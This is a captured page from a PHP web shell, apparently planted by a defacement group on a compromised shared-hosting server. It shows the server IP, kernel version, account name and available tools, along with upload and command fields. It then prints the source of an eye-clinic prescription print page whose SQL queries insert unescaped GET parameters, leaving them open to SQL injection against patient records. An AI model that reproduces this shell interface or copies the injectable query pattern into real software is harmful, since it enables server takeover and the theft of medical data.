Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.117.146.155
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/print/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/print/Print-GlassAdvicesNear.php

<div class='col-sm-12'>
	     <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   	include 'dashboarddocument.php';
}
?>
	  

  <?php

include 'fileheader.php';
?>
						
             	 <?php

      

	    	$sqlpatient2 = "SELECT * FROM site_users WHERE userno='$rpatient[Admitted_Under]'";
	$qsqlpatient2 = mysqli_query($con,$sqlpatient2);
	if($rsn2 = mysqli_fetch_array($qsqlpatient2))
	{
	    echo"
<div class='checkbox'><span style='float: left;'><b>Admission On  :</b> $rpatient[created_at]<br>
<b>Consultant :</b>$rsn2[name]($rpatient[casetype])

</span>

<span style='float: right;'><B>File No.</B> :$rpatient[prescriptionid] <br>";

$sqlpatient = "SELECT * FROM save_activity WHERE  prescriptionid='$_GET[prescriptionid]' AND discription='Intial Assessment<br>GENERAL CONSENT<br>Doc.no-'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	{
	    if($rsp[discription]== 'Intial Assessment<br>GENERAL CONSENT<br>Doc.no-'){
	        echo"<b>Doc.no </b>: $rsp[srno]";

} else{
    echo "";
}
       
	}


echo "</span></div><br>



<br><br>
<div class='checkbox'><span style='float: left;'><b>UHID :</b> $rspi1[patientid]</span><span style='float: right;'><b>Name</b> :$rspi1[patientname]</span></div>
     <br>
     <div class='checkbox'><span style='float: left;'><b>Age:</b> $rspi1[dob]</span><span style='float: right;'><b>SEX :</b>$rspi1[gendor]</span></div>
              <div class='card-body'>
             
      
      ";
	}


	?> 
      <br>   
             
 <div class="panel panel-primary">
               
    <div class="panel-body">
      <h4 class="text-on-pannel text-primary"><strong class="text-uppercase">
         Glass Advices Near 
 </strong></h4>            
               <br>
             
 
  <table id="example2" class="table table-bordered table-hover" style='width:100%;' border='1'>
                  <thead>
         
						<tr>
						    	<th>Glass Advices Near</th>
							<th>Right Eye</th>
							<th>Left Eye</th>
						</tr>
				
      
                  </thead><tbody>
<?php

$sql ="SELECT * FROM Glass_Advices WHERE  patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND  Examination_type='near'";
$qsql = mysqli_query($con,$sql);
$rs = mysqli_fetch_array($qsql);

     echo " 
            <tr>
                      <td>&nbsp;$rs[SPH]</td>
                     <td>&nbsp;$rs[SPH_right]</td>
               		<td>&nbsp; $rs[SPH_left]</td>
          </tr> 
          <tr>
                      <td>&nbsp;$rs[CYL]</td>
                     <td>&nbsp;$rs[CYL_right]</td>
               		<td>&nbsp; $rs[CYL_left]</td>
          </tr>
          <tr>
                      <td>&nbsp;$rs[AXIS]</td>
                     <td>&nbsp;$rs[AXIS_right]</td>
               		<td>&nbsp; $rs[AXIS_left]</td>
          </tr>
          <tr>
                      <td>&nbsp;$rs[VISION]</td>
                     <td>&nbsp;$rs[VISION_right]</td>
               		<td>&nbsp; $rs[VISION_left]</td>
          </tr>
          
          ";


?>    </tbody>
          </table>										
										
    <div style="page-break-before:always">&nbsp;</div>
    
</div>					
					
					
				   	</div>
					
					</div>
					

Anon7 - 2022
AnonSec Team